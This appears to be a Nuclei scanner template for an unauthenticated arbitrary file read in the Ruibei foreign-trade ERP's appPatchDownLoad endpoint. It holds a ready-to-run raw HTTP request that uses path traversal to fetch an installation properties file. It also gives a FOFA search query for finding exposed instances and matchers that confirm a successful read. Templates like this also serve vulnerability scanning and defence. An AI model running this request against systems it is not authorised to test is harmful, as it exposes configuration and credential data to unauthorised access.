http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - DESKTOP=
            - DEPENDENCY_SUCCESSES=
            - DEPENDENCY_REPORT=
            - INSTALLER_JDK_HOME=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
id: ruibeiwaimaoERP-appPatchDownLoad-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="loginNeedMobileNumVerification" || body="睿贝软件"
        睿贝外贸ERP appPatchDownLoad 接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/K2eSwCuNYchpm15b70lb1Q
    severity: high
    tags:
        - File reading
